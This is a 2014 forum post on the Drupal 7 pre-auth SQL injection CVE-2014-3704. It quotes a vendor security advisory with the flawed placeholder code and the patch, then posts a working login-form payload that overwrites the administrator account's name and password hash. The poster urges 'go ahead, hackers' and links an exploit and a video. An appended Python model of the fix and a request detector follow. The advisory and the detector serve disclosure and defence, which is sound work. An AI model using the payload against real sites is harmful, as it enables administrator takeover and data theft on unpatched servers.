
#23
16.10.2014, 16:21
faza02
Banned
Registered: 21.11.2007
Posts: 181
With us: 9721141

Reputation: 1013

CVE-2014-3704 Drupal 7.0 – 7.31 pre-auth SQL Injection Vulnerability

lol

https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

Code:
SektionEins GmbH
                        www.sektioneins.de

                     -= Security  Advisory =-

     Advisory: Drupal - pre-auth SQL Injection Vulnerability
 Release Date: 2014/10/15
Last Modified: 2014/10/15
       Author: Stefan Horst [stefan.horst[at]sektioneins.de]

  Application: Drupal >= 7.0  $data) {
        $new_keys = array();
        foreach ($data as $i => $value) {
          // This assumes that there are no other placeholders that use the same
          // name.  For example, if the array placeholder is defined as :example
          // and there is already an :example_2 placeholder, this will generate
          // a duplicate key.  We do not account for that as the calling code
          // is already broken if that happens.
          $new_keys[$key . '_' . $i] = $value;
        }

        // Update the query with the new placeholders.
        // preg_replace is necessary to ensure the replacement does not affect
        // placeholders that start with the same exact text. For example, if the
        // query contains the placeholders :foo and :foobar, and :foo has an
        // array of values, using str_replace would affect both placeholders,
        // but using the following preg_replace would only affect :foo because
        // it is followed by a non-word character.
        $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

        // Update the args array with the new placeholders.
        unset($args[$key]);
        $args += $new_keys;

        $modified = TRUE;
      }

      return $modified;
    }

  The function assumes that it is called with an array which has no keys. Example:

    db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('user1','user2')));

  Which results in this SQL statement:

    SELECT * from users where name IN (:name_0, :name_1)

  with the parameters name_0 = user1 and name_1 = user2.

  The problem occurs if the array has keys which are not integers. Example:

    db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('test -- ' => 'user1','test' => 'user2')));

  This results in an exploitable SQL query:

     SELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1

  with parameters :name_test = user2.

  Since Drupal uses PDO, multi-queries are allowed. So this SQL Injection can
  be used to insert arbitrary data in the database, dump or modify existing data
  or drop the whole database.

  With the possibility to INSERT arbitrary data into the database an
  attacker can execute any PHP code through Drupal features with callbacks.

Patch:

    $new_keys = array();
    foreach (array_values($data) as $i => $value) {
      // This assumes that there are no other placeholders that use the same
      // name.  For example, if the array placeholder is defined as :example
      // and there is already an :example_2 placeholder, this will generate
      // a duplicate key.  We do not account for that as the calling code
      // is already broken if that happens.
      $new_keys[$key . '_' . $i] = $value;
    }

Proof of Concept:

  SektionEins GmbH has developed a proof of concept, but was asked by
  Drupal to postpone the release.

Disclosure Timeline:

  16 Sep. 2014 - Notified the Drupal devs via security contact form
  15 Oct. 2014 - Release of bugfix by Drupal core developers
PoC:

Code:
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
and it really works

go ahead, hackers

exploit:

http://pastebin.com/nDwLFV3v

video: http://www.youtube.com/watch?v=rHwJYD_yTlM
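Added example, not part of the forum post, the SektionEins advisory or Drupal's own code: a Python model of the placeholder expansion the quoted advisory describes, used to check that the patched behaviour (the `array_values` renumbering in the fix) produces only `:name_<n>` placeholders whatever array keys the caller supplies, followed by a detector for the request shape shown in the PoC above: a form-encoded POST body whose PHP-style array key (`name[...]`) carries SQL syntax. All function names, the sample query and the `SAMPLE_*` bodies are constructed for this example (the hash in the attack sample is a placeholder); the detector generalizes beyond the login form to any field name in the body.

```python
import re
from urllib.parse import unquote_plus

# Part 1: Python sketch of the array-placeholder expansion quoted in the
# advisory (constructed model, not Drupal's PHP).  Unpatched: the caller's
# array keys are used verbatim in the placeholder names, so a key such as
# 'test -- ' lands inside the SQL text.  Patched: keys are discarded and the
# values renumbered 0..n-1, which is what array_values() does in the fix.

def expand_placeholder(query, key, values, patched):
    """Expand ':name' in `query` into ':name_<i>, :name_<j>, ...'."""
    items = enumerate(values.values()) if patched else values.items()
    new_keys = {f"{key}_{i}": v for i, v in items}
    # \b mirrors preg_replace('#:name\b#') in the original: ':name' but not ':namex'
    expanded = re.sub(re.escape(key) + r"\b", ", ".join(new_keys), query)
    return expanded, new_keys


# The only placeholder shape the patched expansion should ever produce.
SAFE_PLACEHOLDER = re.compile(r"^:\w+_\d+$")

def expansion_is_safe(query, key, values):
    """True if the patched expansion yields only integer-suffixed placeholders."""
    _query, new_keys = expand_placeholder(query, key, values, patched=True)
    return all(SAFE_PLACEHOLDER.match(k) for k in new_keys)


# Part 2: spotting the request pattern on the wire.  Input is the raw
# application/x-www-form-urlencoded POST body as recorded by a WAF or reverse
# proxy audit log (ordinary access logs do not carry the body).

ARRAY_KEY = re.compile(r"\[([^\]]*)\]")        # each [...] segment of a field name
SQL_SYNTAX = re.compile(r"--|;|#|/\*|\s|'|\"")  # separators, comment markers, quotes, whitespace

def parse_form_body(body):
    """Split a form-encoded body into decoded (name, value) pairs.

    Done by hand rather than with urllib.parse.parse_qsl because older Pythons
    treat ';' as a pair separator, which would split the very field we want to see.
    """
    pairs = []
    for chunk in body.split("&"):
        if chunk:
            name, _sep, value = chunk.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def suspicious_array_keys(body):
    """Return [(field, key)] for array keys that carry SQL syntax.

    Named keys such as field_x[und][0][value] are routine in Drupal forms and
    are not reported; only keys containing statement separators, comment
    markers, quotes or whitespace are, since none of those belong in an index.
    """
    findings = []
    for name, _value in parse_form_body(body):
        for key in ARRAY_KEY.findall(name):
            if SQL_SYNTAX.search(key):
                findings.append((name.split("[", 1)[0], key))
    return findings


# Constructed sample bodies.  The second follows the shape of the PoC request
# in the post (array key on the login form's `name` field); <HASH> is a placeholder.
SAMPLE_CLEAN = "name=admin&pass=secret&form_build_id=&form_id=user_login_block&op=Log+in"
SAMPLE_ATTACK = (
    "name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'<HASH>'"
    "+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=x"
    "&form_build_id=&form_id=user_login_block&op=Log+in"
)

if __name__ == "__main__":
    q = "SELECT * FROM {users} WHERE name IN (:name)"
    keyed = {"test -- ": "user1", "test": "user2"}   # the advisory's keyed-array input
    print("unpatched:", expand_placeholder(q, ":name", keyed, patched=False)[0])
    print("patched:  ", expand_placeholder(q, ":name", keyed, patched=True)[0])
    print("patched expansion safe:", expansion_is_safe(q, ":name", keyed))
    for body in (SAMPLE_CLEAN, SAMPLE_ATTACK):
        print(suspicious_array_keys(body) or "clean")
```

Running the block prints the unpatched expansion with the caller's key spliced into the SQL and the patched one with `:name_0, :name_1`, then reports the attack sample's `name` field while leaving the clean login POST alone. The detector is deliberately narrow so that nested named keys, which every Drupal form submits, do not trigger it.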